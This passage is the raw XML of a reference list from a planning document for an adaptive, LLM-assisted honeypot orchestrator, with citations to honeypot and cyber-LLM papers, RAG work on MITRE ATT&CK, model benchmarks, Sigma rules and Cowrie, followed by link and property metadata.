        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdmzf0nbb8gwqtckkvbiq0j">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Mitigating safety risks in cyber FT (arxiv 2505.09974)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — instruction transformation method.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdq2wacbnghj_6upwxpzqnj">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CyberMetric benchmark</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — cybersecurity knowledge eval.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">STINGAR (CESER / Duke). </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Community honeypot management and threat-sharing framework; source of the aggregated multi-sensor telemetry layer in Section 6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.2 LLM honeypot research</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdawqmzz9-z8nijowkct5b5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SoK: Honeypots &amp; LLMs (arxiv 2510.25939)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — comprehensive survey; the canonical architecture comes from here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId2cotzj0rs-gqfge2jh87q">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">LLM Honeypot (arxiv 2409.08234)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — fine-tuned LLM as interactive honeypot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdqh8lgo6qfkz0yfvrw8w60">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">LLM Agent Honeypot (arxiv 2410.13919)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — Palisade Research; detecting AI hacking agents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdsx6ybdlubnrrfymwrggxn">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">LLMHoney (arxiv 2509.01463)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — dynamic response generation for SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdx5zbnby-cmf0oww7rcmfb">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">ZeroDay-LLM (MDPI Information 16/11/939)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — zero-day detection framework with honeypot routing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3 RAG architectures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId4xgp88n9yaxo8-na3uxow">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">TechniqueRAG</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — MITRE ATT&amp;CK annotation via RAG.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdividowj8aaskoicdcxsmx">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">CyKG-RAG (CEUR-WS Vol 3950)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — knowledge-graph enhanced retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdepaml-i2yja5qihkjjnbh">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">AgCyRAG (CEUR-WS Vol 4079)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — agentic KG-based RAG.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.4 Model evaluation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId6fpe_sluia_h9bno9_hrn">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Gemma 4 announcement (Google)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdd20xexnw8qnjrb33li20j">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Small model FT benchmarks (distil labs)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId3jahhzyrkmf2our3pczwo">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open source LLM comparison 2026 (siliconflow)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.5 Threat intel &amp; tooling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId7dbwspbiwtmk0huypzvid">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SigmaHQ rule repository</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — open-source detection rule library.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdfhjjagweqq0pe8_be4wcv">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">MITRE ATT&amp;CK framework</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — adversary tactic/technique taxonomy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdjjnljma3qvhryxtff_7vh">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">bge-small-en-v1.5 (HuggingFace)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> — recommended embedding model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.6 Cowrie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdrqg4c9increx0s5tsn7j3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Cowrie repository</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdnhuop2v5w6qvq162p7su-">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Cowrie documentation</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Adaptive Honeypot Orchestrator —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xwafft6fwe2-6kq3hrqs" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arxiv.org/abs/2503.09334" TargetMode="External"/><Relationship Id="rIdmzf0nbb8gwqtckkvbiq0j" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arxiv.org/html/2505.09974v1" TargetMode="External"/><Relationship Id="rIdq2wacbnghj_6upwxpzqnj" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arxiv.org/abs/2402.07688" TargetMode="External"/><Relationship Id="rIdawqmzz9-z8nijowkct5b5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arxiv.org/html/2510.25939v3" TargetMode="External"/><Relationship Id="rId2cotzj0rs-gqfge2jh87q" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arxiv.org/html/2409.08234v1" TargetMode="External"/><Relationship Id="rIdqh8lgo6qfkz0yfvrw8w60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arxiv.org/pdf/2410.13919" TargetMode="External"/><Relationship Id="rIdsx6ybdlubnrrfymwrggxn" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arxiv.org/pdf/2509.01463" TargetMode="External"/><Relationship Id="rIdx5zbnby-cmf0oww7rcmfb" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mdpi.com/2078-2489/16/11/939" TargetMode="External"/><Relationship Id="rId4xgp88n9yaxo8-na3uxow" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jenray1986/unmasking-cyber-threats-with-precision-how-techniquerags-ai-is-revolutionizing-mitre-att-ck-7cbbcea0481a" TargetMode="External"/><Relationship Id="rIdividowj8aaskoicdcxsmx" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ceur-ws.org/Vol-3950/paper1.pdf" TargetMode="External"/><Relationship Id="rIdepaml-i2yja5qihkjjnbh" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ceur-ws.org/Vol-4079/paper11.pdf" TargetMode="External"/><Relationship Id="rId6fpe_sluia_h9bno9_hrn" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/" TargetMode="External"/><Relationship Id="rIdd20xexnw8qnjrb33li20j" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.distillabs.ai/blog/we-benchmarked-12-small-language-models-across-8-tasks-to-find-the-best-base-model-for-fine-tuning/" TargetMode="External"/><Relationship Id="rId3jahhzyrkmf2our3pczwo" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.siliconflow.com/articles/en/best-open-source-LLM-for-Cybersecurity-Threat-Analysis" TargetMode="External"/><Relationship Id="rId7dbwspbiwtmk0huypzvid" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/SigmaHQ/sigma" TargetMode="External"/><Relationship Id="rIdfhjjagweqq0pe8_be4wcv" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/" TargetMode="External"/><Relationship Id="rIdjjnljma3qvhryxtff_7vh" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://huggingface.co/BAAI/bge-small-en-v1.5" TargetMode="External"/><Relationship Id="rIdrqg4c9increx0s5tsn7j3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cowrie/cowrie" TargetMode="External"/><Relationship Id="rIdnhuop2v5w6qvq162p7su-" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.cowrie.or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Honeypot Orchestrator — Planning Document</dc:title>
  <dc:creator>Adaptive Honeypot Project</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-29T22:46:48.104Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-29T22:46:48.105Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>